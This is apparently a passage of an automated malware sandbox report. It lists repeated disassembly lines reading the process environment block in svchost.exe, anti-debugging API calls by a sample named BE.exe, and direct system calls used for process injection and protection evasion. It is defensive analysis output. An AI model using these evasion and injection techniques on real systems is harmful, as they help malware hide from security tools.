Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396656A mov eax, dword ptr fs:[00000030h] 2_2_0396656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396656A mov eax, dword ptr fs:[00000030h] 2_2_0396656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396656A mov eax, dword ptr fs:[00000030h] 2_2_0396656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039EA49A mov eax, dword ptr fs:[00000030h] 2_2_039EA49A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h] 2_2_039644B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h] 2_2_039BA4B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039364AB mov eax, dword ptr fs:[00000030h] 2_2_039364AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h] 2_2_039304E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03968402 mov eax, dword ptr fs:[00000030h] 2_2_03968402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03968402 mov eax, dword ptr fs:[00000030h] 2_2_03968402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03968402 mov eax, dword ptr fs:[00000030h] 2_2_03968402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396A430 mov eax, dword ptr fs:[00000030h] 2_2_0396A430
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h] 2_2_0392E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h] 2_2_0392E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h] 2_2_0392E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h] 2_2_0392C427
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h] 2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h] 2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h] 2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h] 2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h] 2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h] 2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h] 2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039EA456 mov eax, dword ptr fs:[00000030h] 2_2_039EA456
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392645D mov eax, dword ptr fs:[00000030h] 2_2_0392645D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395245A mov eax, dword ptr fs:[00000030h] 2_2_0395245A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h] 2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h] 2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h] 2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h] 2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h] 2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h] 2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h] 2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h] 2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h] 2_2_0395A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h] 2_2_0395A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h] 2_2_0395A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h] 2_2_039BC460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h] 2_2_03940BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h] 2_2_03940BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h] 2_2_039E4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h] 2_2_039E4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h] 2_2_039DEBD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h] 2_2_03950BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h] 2_2_03950BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h] 2_2_03950BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h] 2_2_03930BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h] 2_2_03930BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h] 2_2_03930BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h] 2_2_03938BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h] 2_2_03938BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h] 2_2_03938BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h] 2_2_0395EBFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h] 2_2_039BCBF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h] 2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h] 2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h] 2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h] 2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h] 2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h] 2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h] 2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h] 2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h] 2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A04B00 mov eax, dword ptr fs:[00000030h] 2_2_03A04B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h] 2_2_0395EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h] 2_2_0395EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h] 2_2_039F8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h] 2_2_039F8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03928B50 mov eax, dword ptr fs:[00000030h] 2_2_03928B50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DEB50 mov eax, dword ptr fs:[00000030h] 2_2_039DEB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h] 2_2_039E4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h] 2_2_039E4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h] 2_2_039C6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h] 2_2_039C6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h] 2_2_039FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h] 2_2_039D8B42
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h] 2_2_0392CB7E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h] 2_2_03A02B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h] 2_2_03A02B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h] 2_2_03A02B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h] 2_2_03A02B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h] 2_2_03968A90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h] 2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h] 2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h] 2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h] 2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h] 2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h] 2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h] 2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h] 2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h] 2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h] 2_2_03A04A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h] 2_2_03938AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h] 2_2_03938AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h] 2_2_03986AA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h] 2_2_03930AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h] 2_2_03964AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h] 2_2_03964AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h] 2_2_03986ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h] 2_2_03986ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h] 2_2_03986ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h] 2_2_0396AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h] 2_2_0396AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h] 2_2_039BCA11
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h] 2_2_03954A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h] 2_2_03954A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396CA38 mov eax, dword ptr fs:[00000030h] 2_2_0396CA38
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h] 2_2_0396CA24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h] 2_2_0395EA2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h] 2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h] 2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h] 2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h] 2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h] 2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h] 2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h] 2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h] 2_2_03940A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h] 2_2_03940A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h] 2_2_039ACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h] 2_2_039ACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h] 2_2_0396CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h] 2_2_0396CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h] 2_2_0396CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DEA60 mov eax, dword ptr fs:[00000030h] 2_2_039DEA60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h] 2_2_039B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h] 2_2_039B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h] 2_2_039B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h] 2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h] 2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h] 2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h] 2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h] 2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h] 2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h] 2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h] 2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h] 2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h] 2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h] 2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h] 2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h] 2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039309AD mov eax, dword ptr fs:[00000030h] 2_2_039309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039309AD mov eax, dword ptr fs:[00000030h] 2_2_039309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h] 2_2_039649D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h] 2_2_039FA9D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h] 2_2_039C69C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h] 2_2_039629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h] 2_2_039629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h] 2_2_039BE9E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h] 2_2_039BC912
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03928918 mov eax, dword ptr fs:[00000030h] 2_2_03928918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03928918 mov eax, dword ptr fs:[00000030h] 2_2_03928918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h] 2_2_039AE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h] 2_2_039AE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B892A mov eax, dword ptr fs:[00000030h] 2_2_039B892A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C892B mov eax, dword ptr fs:[00000030h] 2_2_039C892B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h] 2_2_039B0946
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A04940 mov eax, dword ptr fs:[00000030h] 2_2_03A04940
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h] 2_2_039D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h] 2_2_039D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h] 2_2_039BC97C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03956962 mov eax, dword ptr fs:[00000030h] 2_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03956962 mov eax, dword ptr fs:[00000030h] 2_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03956962 mov eax, dword ptr fs:[00000030h] 2_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0397096E mov eax, dword ptr fs:[00000030h] 2_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0397096E mov edx, dword ptr fs:[00000030h] 2_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0397096E mov eax, dword ptr fs:[00000030h] 2_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h] 2_2_039BC89D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03930887 mov eax, dword ptr fs:[00000030h] 2_2_03930887
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h] 2_2_0395E8C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A008C0 mov eax, dword ptr fs:[00000030h] 2_2_03A008C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0396C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0396C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h] 2_2_039FA8E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h] 2_2_039BC810
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h] 2_2_03952835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h] 2_2_03952835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h] 2_2_03952835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03952835 mov ecx, dword ptr fs:[00000030h] 2_2_03952835
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_003E0B62
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_003B2622
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003A083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_003A083F
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003A09D5 SetUnhandledExceptionFilter, 0_2_003A09D5
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003A0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_003A0C21

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtResumeThread: Direct from: 0x773836AC Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtMapViewOfSection: Direct from: 0x77382D1C Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtWriteVirtualMemory: Direct from: 0x77382E3C Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtProtectVirtualMemory: Direct from: 0x77382F9C Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtSetInformationThread: Direct from: 0x773763F9 Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtCreateMutant: Direct from: 0x773835CC Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtNotifyChangeKey: Direct from: 0x77383C2C Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtSetInformationProcess: Direct from: 0x77382C5C Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtCreateUserProcess: Direct from: 0x7738371C Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtQueryInformationProcess: Direct from: 0x77382C26 Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtResumeThread: Direct from: 0x77382FBC Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtWriteVirtualMemory: Direct from: 0x7738490C Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtOpenKeyEx: Direct from: 0x77383C9C Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtReadFile: Direct from: 0x77382ADC Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtDelayExecution: Direct from: 0x77382DDC Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtQuerySystemInformation: Direct from: 0x77382DFC Jump to behavior
